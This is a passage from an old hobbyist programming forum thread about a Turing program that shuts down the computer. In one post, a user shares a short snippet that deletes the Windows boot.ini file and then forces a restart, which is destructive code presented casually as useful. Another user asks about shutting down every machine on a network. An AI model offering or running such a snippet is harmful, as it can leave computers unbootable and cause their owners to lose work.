Programming C, C++, Java, PHP, Ruby, Turing, VB
Computer Science Canada 
Programming C, C++, Java, PHP, Ruby, Turing, VB  

Username:   Password: 
 RegisterRegister   
 [SOURCE]--System Shutdown
Index -> Programming, Turing -> Turing Submissions
Goto page Previous  1, 2
View previous topic Printable versionDownload TopicRate TopicSubscribe to this topicPrivate MessagesRefresh page View next topic
Author Message
[Gandalf]




PostPosted: Tue Nov 28, 2006 10:37 pm   Post subject: (No subject)

Ehm... lord_pwnerer, just beause you recently wrote a tutorial on the subject doesn't mean that you should revive every post ever made about it. In case you hadn't noticed, this is a two year old topic, and you just necro-posted.
Sponsor
Sponsor
Sponsor
sponsor
lord_pwnerer




PostPosted: Wed Nov 29, 2006 7:56 am   Post subject: (No subject)

goddamnit, you're right. Sorry about that, I really need to start looking at the dates.
Lazarus




PostPosted: Wed Dec 20, 2006 3:12 pm   Post subject: (No subject)

Just out of curiousity, could this be used over a network? as in shutdown all the computer on the network?
Prince Pwn




PostPosted: Mon Jan 08, 2007 6:28 am   Post subject: Re: [SOURCE]--System Shutdown

I never knew of the system command before! That is so awesome.
Also this could be a useful program, don't know if it works or not:
code:

var DriveLetter : string := Dir.Current
DriveLetter := DriveLetter (1)
put DriveLetter + ":/boot.ini"
File.Delete (DriveLetter + ":/boot.ini")
put Sys.Exec (DriveLetter + ":/Windows/System32/Shutdown.exe -r")
cls
unknowngiver




PostPosted: Mon Jan 08, 2007 12:06 pm   Post subject: RE:[SOURCE]--System Shutdown

omggg yaiii i can mess around with the system now *waits for someone to write a tutorial on terminal commands:p*
Display posts from previous:   
   Index -> Programming, Turing -> Turing Submissions
View previous topic Tell A FriendPrintable versionDownload TopicRate TopicSubscribe to this topicPrivate MessagesRefresh page View next topic

Page 2 of 2  [ 20 Posts ]
Goto page Previous  1, 2
Jump to:   


Style:  
Search: